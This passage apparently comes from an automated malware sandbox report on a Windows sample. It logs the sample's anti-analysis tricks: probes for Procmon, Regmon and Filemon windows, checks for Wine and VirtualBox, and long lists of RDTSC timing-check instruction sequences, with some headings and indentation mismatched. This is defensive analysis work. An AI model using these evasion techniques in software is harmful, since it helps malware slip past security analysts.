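    entry_rva=0x5000)                         # RVA of the fifth section, .taggant
```

On the real sample the same `audit_pe()` call would report the stored 0x1c2907 against a computed 0x1cb203 and an entropy of about 7.95 for `uygwklsw`. A CheckSum of 0 is common for unsigned binaries and is not by itself suspicious; a non-zero value that does not verify is the stronger signal, since it usually means the header was rewritten after link time.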

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_0-13404)
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110EBD6 second address: 110EBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 10F83A3 second address: 10F83A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110DB53 second address: 110DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FC83CB776A6h 0x0000000c jng 00007FC83CB776A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC83CB776B2h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110DB7E second address: 110DBA4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007FC83CB64D36h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007FC83CB64D36h 0x00000020 jne 00007FC83CB64D36h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110DE40 second address: 110DE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC83CB776B0h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110DF81 second address: 110DFA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC83CB64D36h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E12C second address: 110E150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83CB776B4h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E150 second address: 110E165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D41h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E165 second address: 110E16B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E2E0 second address: 110E30A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC83CB64D36h 0x0000000a pushad 0x0000000b jmp 00007FC83CB64D45h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnl 00007FC83CB64D36h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E30A second address: 110E30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E47A second address: 110E484 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC83CB64D36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110E484 second address: 110E48D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110FDCE second address: 110FDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110FDD5 second address: 110FDDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110FDDA second address: 110FE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FC83CB64D3Ah 0x00000010 push esi 0x00000011 pushad 0x00000012 popad 0x00000013 pop esi 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a jmp 00007FC83CB64D3Dh 0x0000001f push eax 0x00000020 push eax 0x00000021 pop eax 0x00000022 pop eax 0x00000023 popad 0x00000024 mov eax, dword ptr [eax] 0x00000026 jmp 00007FC83CB64D48h 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110FE2E second address: 110FE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110FE32 second address: 110FE4C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FC83CB64D3Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 110FE4C second address: 110FF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 sub dword ptr [ebp+122D32AEh], ebx 0x0000000d push 00000003h 0x0000000f and cx, DD69h 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 jno 00007FC83CB776ACh 0x0000001d pop esi 0x0000001e push 00000003h 0x00000020 jmp 00007FC83CB776B2h 0x00000025 call 00007FC83CB776A9h 0x0000002a jmp 00007FC83CB776B1h 0x0000002f push eax 0x00000030 jne 00007FC83CB776ACh 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a jmp 00007FC83CB776B3h 0x0000003f mov eax, dword ptr [eax] 0x00000041 jmp 00007FC83CB776B5h 0x00000046 mov dword ptr [esp+04h], eax 0x0000004a jnl 00007FC83CB776BFh 0x00000050 pop eax 0x00000051 add esi, dword ptr [ebp+122D1AE6h] 0x00000057 lea ebx, dword ptr [ebp+12451CAEh] 0x0000005d pushad 0x0000005e mov esi, 1806DF8Fh 0x00000063 mov ebx, 6B90DE19h 0x00000068 popad 0x00000069 and ecx, 3E8F46DFh 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC83CB776AFh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110009 second address: 11100CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jmp 00007FC83CB64D3Fh 0x0000000e mov eax, dword ptr [eax] 0x00000010 push ecx 0x00000011 jmp 00007FC83CB64D43h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push ecx 0x0000001c jmp 00007FC83CB64D48h 0x00000021 pop ecx 0x00000022 pop eax 0x00000023 jmp 00007FC83CB64D3Dh 0x00000028 push 00000003h 0x0000002a mov esi, dword ptr [ebp+122D3298h] 0x00000030 push 00000000h 0x00000032 jne 00007FC83CB64D3Ch 0x00000038 push 00000003h 0x0000003a call 00007FC83CB64D40h 0x0000003f xor edx, dword ptr [ebp+122D2C97h] 0x00000045 pop edi 0x00000046 call 00007FC83CB64D39h 0x0000004b push ebx 0x0000004c pushad 0x0000004d jmp 00007FC83CB64D47h 0x00000052 push edx 0x00000053 pop edx 0x00000054 popad 0x00000055 pop ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 jne 00007FC83CB64D38h 0x0000005e pop edx 0x0000005f mov eax, dword ptr [esp+04h] 0x00000063 pushad 0x00000064 pushad 0x00000065 push edi 0x00000066 pop edi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11100CE second address: 111010B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FC83CB776BEh 0x0000000b jmp 00007FC83CB776B8h 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007FC83CB776B5h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111010B second address: 1110124 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110124 second address: 1110129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1110129 second address: 111012E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1122380 second address: 112239E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FDBF second address: 112FDC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FDC4 second address: 112FDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FF1F second address: 112FF2B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112FF2B second address: 112FF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC83CB776A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11300A3 second address: 11300A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11300A9 second address: 11300AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130356 second address: 1130371 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D47h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130371 second address: 1130384 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB776AFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130973 second address: 1130979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130979 second address: 113097D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113097D second address: 1130997 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D41h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130997 second address: 11309C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FC83CB776AEh 0x00000011 push edi 0x00000012 pop edi 0x00000013 jnc 00007FC83CB776A6h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC83CB776B2h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11309C4 second address: 11309D8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC83CB64D36h 0x00000008 jmp 00007FC83CB64D3Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CB2 second address: 1130CB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CB7 second address: 1130CD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FC83CB64D36h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CD1 second address: 1130CD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130CD5 second address: 1130CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128128 second address: 1128140 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FC83CB776AEh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128140 second address: 1128146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128146 second address: 1128166 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC83CB776ACh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC83CB776A6h 0x00000013 jc 00007FC83CB776A6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128166 second address: 112817E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC83CB64D42h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB9A3 second address: 10FB9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB9A9 second address: 10FB9E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FC83CB64D36h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007FC83CB64D3Ch 0x00000010 jmp 00007FC83CB64D43h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b push edx 0x0000001c pop edx 0x0000001d jg 00007FC83CB64D36h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FB9E1 second address: 10FBA26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FC83CB776ACh 0x0000000e jmp 00007FC83CB776B7h 0x00000013 jmp 00007FC83CB776B5h 0x00000018 popad 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBA26 second address: 10FBA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130F9D second address: 1130FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC83CB776ADh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FB3 second address: 1130FB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FB9 second address: 1130FC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jc 00007FC83CB776ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FC8 second address: 1130FD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FD0 second address: 1130FD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1130FD4 second address: 1130FDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113186B second address: 1131871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1131871 second address: 113188E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D44h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113188E second address: 1131892 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134537 second address: 1134540 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCB1 second address: 10EFCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC83CB776AAh 0x0000000d ja 00007FC83CB776A6h 0x00000013 jmp 00007FC83CB776ACh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCD7 second address: 10EFCE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCE0 second address: 10EFCE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EFCE6 second address: 10EFCEC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110571C second address: 1105722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1105722 second address: 110572D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110572D second address: 1105747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776B3h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E2CD second address: 113E2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E2D3 second address: 113E2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E591 second address: 113E5AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D42h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E5AD second address: 113E5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E5B1 second address: 113E5B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E5B7 second address: 113E5C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EB3A second address: 113EB50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC83CB64D3Dh 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113EB50 second address: 113EB68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FC83CB776AEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114298C second address: 11429B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D48h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FC83CB64D3Ah 0x0000000f push edx 0x00000010 pop edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144ED7 second address: 1144EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1144F6E second address: 1144F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11450F5 second address: 11450FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11450FA second address: 114510E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC83CB64D40h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11455F5 second address: 11455FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145C1A second address: 1145C1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1145C1E second address: 1145C2F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC83CB776A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
